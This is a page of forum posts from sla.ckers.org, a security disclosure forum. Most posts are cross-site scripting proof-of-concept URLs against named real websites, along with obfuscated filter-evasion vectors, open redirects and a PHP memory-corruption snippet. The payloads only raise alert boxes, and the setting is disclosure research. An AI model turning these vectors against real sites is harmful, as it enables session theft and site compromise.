sla.ckers.org is ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Current Page: 1 of 2
Results 1 - 30 of 38
5 years ago
C1c4Tr1Z
@thornmaker: Because I saw that on p42.us, and I wanted to change it based on that vector, trying to bypass PHPIDS. (but I couldn't)
Forum: Projects
5 years ago
C1c4Tr1Z
@.mario: Yeah, I think that was the problem, because I was testing this vector from p42.us: a=alert,a(0) I was playing with something like this, but its impact is 35. :D a=/aalertt/;/a(.*)t/.test(a),a=eval(RegExp.$1);a(0) bye!
Forum: Projects
5 years ago
C1c4Tr1Z
I don't know if this is the right place to post it, but I've found a vector that PHPIDS didn't recognize: a>>/al/+/ert/|a(0) Thanks! EDIT: This vector doesn't seem to work! My browser is crazy :).
Forum: Projects
5 years ago
C1c4Tr1Z
Browser Security Handbook http://code.google.com/p/browsersec/ Google doctype's Web Security section http://code.google.com/p/doctype/wiki/ArticlesXSS
Forum: Obfuscation
5 years ago
C1c4Tr1Z
concat() also works: ({}=[].concat)()[0] == window
Forum: XSS Info
5 years ago
C1c4Tr1Z
Well, at least it's secure..
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
jojo! nice magicmac. MAD got xssed: http://www.dccomics.com/mad/popup_marginal.php?m=weather_shop_talk%22;alert(/XSS/.source);%22
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://www.truste.org/ivalidate.php?url=http://www.verisign.com/&sealid=101" onmouseover=alert('XSS') " We love sarcasm.
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://w2.hidemyass.com/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29tLmFyLz9xPVwiIG9ubW91c2VvdmVyPWFsZXJ0KC9DMWM0VHIxWi8uc291cmNlKT4=
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://shop.starwars.com/catalog/product.xml?product_id=1223186;category_id=100750&rid=SWHP3PROD%27,%22%22),$=alert,_=%22XSS%22,$(_)// I had to bypass something like this (;|+\(.*\))+ PS: Upss! It's McAfee SECURE!
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
Oh my: http://www.microsoft.com.mk/Default.aspx?tabindex=0&tabid=47&search=<img/src/onerror=alert(/XSS/.source)>
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://messagebot.com/cgi-bin/click.cgi?http://sla.ckers.org/forum/
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
And, Kodak: http://www.kodak.com/global/en/service/products/ekn035324.jhtml?pq-path=12998%22;alert(0),foo=%22 http://www.kodak.com/eknec/PageQuerier.jhtml?pq-path=204&pq-locale=es_AR&successURI=%22%3E%3Cimg/src/onerror=%22alert(%27xss @euronymous: http://demodms.hosty.it/index.php?redirection=%22%3E%3Ciframe/src=%22javascript:alert(%27XSS%27)
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
Thanks DoctorDan! I'll read it. I've found this also: http://applesoup.googlepages.com/bypass_filter.txt
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
This is something weird.. hxxps://addons.mozilla.org/en-US/firefox/search?q=%C0%22%20onmouseover=alert(/xss/.source)%20\&cat=all Tested on FF 3.0.3 (UTF-8)
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
@Kyo: mmm... that's weird. Because if you look at the source code, you will see that the syntax is correct.
Forum: XSS Info
5 years ago
C1c4Tr1Z
FF3 Unix: http://www.time.com/time/searchresults?N=0&Ntk=NoBody&Nty=1&Nr=OR(1=1)&Ntt=%22);%0Aa=alert,a(%22XSS
Forum: XSS Info
5 years ago
C1c4Tr1Z
I think that maybe WebScarab or the Burp suite have more features.
Forum: XSS Info
5 years ago
C1c4Tr1Z
I only have found some XSS but with POST requests. But if you are searching for bugs, there's a nice SQL Injection..
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
I fuzzed the browser with UTF-7 and the only char that seems to give me a valid javascript execution is char 43.
Forum: XSS Info
5 years ago
C1c4Tr1Z
Just more easy functions: with(b={})if((b.c=function(){return'ale'})&&(b.a=function(){return'rt'}))eval(b.c()+b.a())(0); a=/aalertt/;/a(.*)t/.test(a),a=eval(RegExp.$1),a(0) Tell me if one of them doesn't work :S
Forum: XSS Info
5 years ago
C1c4Tr1Z
Maybe just the whitelist, because a blacklist must be updated very often.
Forum: XSS Info
5 years ago
C1c4Tr1Z
Here, realpath() and other functions appear in this advisory of Hardened-PHP: http://www.hardened-php.net/advisory_012004.42.html
Forum: Projects
5 years ago
C1c4Tr1Z
Here are three functions that you might like: realpath() stream_set_write_buffer() is_writable() && is_readable()
Forum: Projects
5 years ago
C1c4Tr1Z
I was thinking of memory allocation or off-by-one exploits. For example: <?php /*PHP 4 < 4.4.5 and PHP 5 < 5.2.1*/ str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538)); ?>
Forum: Projects
5 years ago
C1c4Tr1Z
id Wrote:
-------------------------------------------------------
> Ummmmm....they did let him, they just happened to
> fix it later.
Ohh, sorry.
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
I've found that if you put something like this in the URI with Greasemonkey installed, the addon starts "Fetching user script": {;}.user.js And it seems that makes an infinite loop. Then, in the same tab/window, you write: http://www.foo.com/bar.user.js Greasemonkey recognizes the HTML source as a plugin for this addon, instead of sending the normal "Error loading user scr
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
I don't think that Yahoo! has no sense of security and let you inject so easy JS code. :S
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
Here's one, it's very simple but I didn't read it in the thread: <iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==>
Forum: XSS Info
5 years ago
C1c4Tr1Z
Another aol redirection: http://www.aol.com/redir.adp?_e_t=ap&_a_v=2.0&_a_i=100214839x1203415855x1200131198&_url=http://www.xssed.com/
Forum: Full Disclosure